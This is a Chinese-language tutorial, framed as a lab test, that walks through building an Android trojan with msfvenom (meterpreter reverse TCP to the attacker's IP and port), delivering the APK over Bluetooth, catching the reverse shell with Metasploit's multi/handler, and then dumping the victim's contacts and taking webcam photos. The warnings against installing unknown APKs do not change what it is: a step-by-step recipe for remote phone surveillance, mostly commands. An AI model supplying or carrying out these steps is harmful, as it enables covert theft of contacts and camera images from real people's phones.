前言

本次渗透为靶机测试。切勿用于非法用途!

攻击者:192.168.1.3 termux metasploit

受害者:192.168.1.2 Android 5.1 - Linux 3.10.72 (aarch64)

使用模块:multi/handler

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(1)

首先生成安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(2)

将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(3)

受害者安装即可。回到攻击者,启动msfconsole。首先选择模块

use exploit multi/handler

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(4)

设置监听地址

set lhost 192.168.1.3

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(5)

设置反弹端口

set lprot 3800

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(6)

设置playload

set payload android/meterpreter/reverse_tcp

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(7)

启动

run

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(8)

成功。试试执行命令。系统信息。

sysinfo

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(9)

试试下载通讯录

dump_contacts

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(10)

成功保存为txt文件。后面因为长时间未操作自动断开了。

试试拍照

webcam_snap

安装包无法通过检测怎么安装(来路不明的安装包请勿安装)(11)

成功保存在files目录下。还有很多危险功能我就不一一说明了。一些来路不明的apk切勿安装。

,